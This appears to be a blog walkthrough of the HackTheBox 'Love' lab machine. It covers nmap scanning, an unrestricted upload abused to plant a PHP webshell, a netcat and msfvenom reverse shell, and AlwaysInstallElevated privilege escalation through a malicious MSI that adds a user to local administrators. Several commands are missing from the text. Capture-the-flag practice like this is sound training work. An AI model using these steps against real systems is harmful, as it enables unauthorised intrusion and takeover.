The Dutch Hacker
hackthebox writeup love

Love – HackTheBox Writeup


Start with an full nmap scan

Nmap -T5 -A

notice that port 5000 is not accesible. Even when scanning with dirbuster

Add and love.htb to the host file by typing in the following

nano /etc/hosts

Open dirbuster by typing


Navigating to http://love.htb/admin is giving us a box for credentials

Naviagting to


navigate to

Click on Demo and type in

We can use these credentials in

In the right corner click on the user name then update

Click browse to upload a file. Notice there is no file checker so we can upload what we want. All files will come into the image directory we noticed earlier

We now have a way to upload a file and to execute php files. Now for the exploit

Option 1 (Without Metasploit):

Type in the following command to get the wwwolf webshell


Upload the webshell

Open the webshell by navigating to


To get the flag type in the following in the cmd

type c:\users\phoebe\desktop\user.txt

You can also upload nc.exe ( located on kali in /usr/share/windows-binaries/ )

Start a listner on your machine

nc -nlvp 22525

Execute the command to let the target machine connect to your machine

You can now upload and execute files. This is a very stable shell

Option 2 ( With Metasploit )

Creat a shell first to upload

msfvenom -a x64 --platform windows -p windows/shell/reverse_tcp LHOST= LPORT=2525 -f exe -o shell.exe


Upload winpeas.exe

Run winpeas with the following paramete

winpease log

You can see the log here


Notice this

You can also check if this is true with the following reg query

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

This means the user has elevated permissions when installing trough windows installer.

The Exploit

( Without Metasploit )

We are going to add the phoebe user to the local admin group

Create an msi package

 msfvenom -p windows/exec CMD='net localgroup administrators LOVE\phoebe /add' -f msi 
> ~/Desktop/up.msi

Upload the msi file

Run the command on the local machine

msiexec /qn /i up2.msi

net use phoebe to check if you are in the administrator group

Most Popular Post

Sign Up

Signup today for free and be the first to get notified on new updates.
* indicates required

Follow Me

Most Popular Post

Contact Us